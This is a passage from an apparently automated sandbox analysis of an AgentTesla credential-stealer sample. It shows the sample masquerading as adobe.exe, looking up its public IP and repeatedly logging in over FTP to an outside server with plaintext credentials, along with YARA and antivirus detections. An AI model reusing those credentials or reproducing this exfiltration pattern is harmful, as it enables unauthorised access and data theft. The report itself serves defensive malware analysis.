                                                                Data Ascii: 24.38.253.191


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1049693104.26.13.2054438148C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-07 22:38:27 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2025-03-07 22:38:28 UTC425INHTTP/1.1 200 OK
                                                                Date: Fri, 07 Mar 2025 22:38:28 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 13
                                                                Connection: close
                                                                Vary: Origin
                                                                cf-cache-status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 91cd9552b9b2056c-IAD
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=28523&min_rtt=25481&rtt_var=9117&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=96353&cwnd=250&unsent_bytes=0&cid=0eda0ac7457aba4f&ts=760&x=0"
                                                                2025-03-07 22:38:28 UTC13INData Raw: 32 34 2e 33 38 2e 32 35 33 2e 31 39 31
                                                                Data Ascii: 24.38.253.191


                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Mar 7, 2025 23:37:37.802586079 CET2149688213.189.52.181192.168.2.10220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21.220-This is a private system - No anonymous login
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:37. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                                Mar 7, 2025 23:37:37.802874088 CET4968821192.168.2.10213.189.52.181USER f2241_dod
                                                                Mar 7, 2025 23:37:37.995435953 CET2149688213.189.52.181192.168.2.10331 User f2241_dod OK. Password required
                                                                Mar 7, 2025 23:37:37.995651960 CET4968821192.168.2.10213.189.52.181PASS Doll900@@
                                                                Mar 7, 2025 23:37:41.742722034 CET2149688213.189.52.181192.168.2.10530 Login authentication failed
                                                                Mar 7, 2025 23:38:20.694922924 CET2149692213.189.52.181192.168.2.10220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.220-This is a private system - No anonymous login
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                                Mar 7, 2025 23:38:20.695208073 CET4969221192.168.2.10213.189.52.181USER f2241_dod
                                                                Mar 7, 2025 23:38:20.891527891 CET2149692213.189.52.181192.168.2.10331 User f2241_dod OK. Password required
                                                                Mar 7, 2025 23:38:20.891676903 CET4969221192.168.2.10213.189.52.181PASS Doll900@@
                                                                Mar 7, 2025 23:38:26.165648937 CET2149692213.189.52.181192.168.2.10530 Login authentication failed
                                                                Mar 7, 2025 23:38:29.645944118 CET2149694213.189.52.181192.168.2.10220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.220-This is a private system - No anonymous login
                                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 23:38. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                                Mar 7, 2025 23:38:29.646142006 CET4969421192.168.2.10213.189.52.181USER f2241_dod
                                                                Mar 7, 2025 23:38:29.839858055 CET2149694213.189.52.181192.168.2.10331 User f2241_dod OK. Password required
                                                                Mar 7, 2025 23:38:29.840059042 CET4969421192.168.2.10213.189.52.181PASS Doll900@@
                                                                Mar 7, 2025 23:38:34.306725025 CET2149694213.189.52.181192.168.2.10530 Login authentication failed

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:17:37:04
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\Desktop\x4l3iVpFSc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\x4l3iVpFSc.exe"
                                                                Imagebase:0x340000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1476195329.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:17:37:33
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\Desktop\x4l3iVpFSc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\x4l3iVpFSc.exe"
                                                                Imagebase:0xd50000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2440123825.000000000338A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2440123825.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2440123825.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:17:37:46
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                                Imagebase:0x310000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 64%, Virustotal, Browse
                                                                • Detection: 61%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:17:37:55
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                                Imagebase:0x870000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1982245399.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:17:38:16
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                                Imagebase:0x3e0000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1985241633.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:17:38:25
                                                                Start date:07/03/2025
                                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                                Imagebase:0x960000
                                                                File size:3'137'440 bytes
                                                                MD5 hash:F34B45032D884D86F62B2A0331A1C9DE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2441073998.000000000304A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >